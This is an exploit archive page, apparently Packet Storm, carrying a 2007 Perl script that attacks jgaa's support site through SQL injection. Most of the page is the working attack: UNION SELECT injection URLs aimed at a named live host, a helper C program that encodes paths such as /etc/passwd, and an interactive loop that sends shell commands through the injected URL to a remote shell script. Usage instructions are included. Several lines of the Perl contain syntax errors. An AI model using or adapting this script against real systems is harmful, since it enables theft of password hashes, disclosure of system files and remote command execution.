what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

jgaa-sql.txt

jgaa-sql.txt
Posted Jul 25, 2007
Authored by fl0 fl0w

jgaa remote SQL injection exploit that allows administrator password hash retrieval.

tags | exploit, remote, sql injection
SHA-256 | 1f985808327542ceaf40c4201340e279d95406ff802e793817633815898a85db

jgaa-sql.txt

Change Mirror Download
#!/usr/bin/perl
#You can get admin hash,or acces the pass file from the *NIx
#with the generated strings with the generator.c program
#you have to put in sql specific comands,my example is for
#tables and *NIX pass
#exploit tested on winxp sp2
# #include<stdio.h>

# #include<stdlib.h>

# #include<string.h>

# int main()

# { char st[1024];
# int le;
# printf("Input : ");
# gets(st);
# for(le=0;le<strlen(st);le++)

# { printf("%d,",st[le]);
# }
# system("pause");

# return 0;
# }

#101,116,99,47,112,97,115,115,119,100 = /etc/passwd

#If we would do this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#we create 8 tables ,to see the result type :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

print "......Start.......\n";
print ".................\n";
print ". fl0 fl0w .\n";
print ". found by fl0w fl0w\n";
print ". c0ded by fl0 fl0w\n";
print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n";
print ".................\n\n";

use LWP::UserAgent;

$site=@ARGV[0];

$shells=@ARGV[1];
$shellcmd=@ARGV[2];

if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)

{ routine()
}

header();

while() { print"[shell] \$";
while(<STDIN>)
{ $cmd=$_;

chomp($cmd);
$sploit=LWP::UserAgent->new() or die;
$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";
$re=$sploit->request(requesting);

$i=$re->content;
$i=~tr/[\n]/[ê]/;
if(!$cmd) { print "Enter a command\n\n";
$i="";
}


elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )

{ print "\nCould NOT connect to cmd from host \n";
exit;
}
elsif($i=~/^<br.\/>.<b>WARNING/) {
print "\nInvalid command\n\n";

};
if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)
{ $last=$1;
$last=~tr/[&234;]/[\n]/;
print "\n$last\n";
last;
}


else {
print "[shell] \$";
}
}
}
last;

sub header()
{ print q {

================================================================================================================================================================
MSQL injection -file disclosure in Jgaa's Internet
PoC:http://support.jgaa.com
Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
}

}
sub routine()
{ header();
print q {
======================================================================================================
USAGE: perl exploit.pl <http://site.com>
EXAMPLE: perl [localhost\][path] exploit.pl [target]
======================================================================================================
};

exit();

}





---------------------------------
Yahoo! oneSearch: Finally, mobile search that gives answers, not web links.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close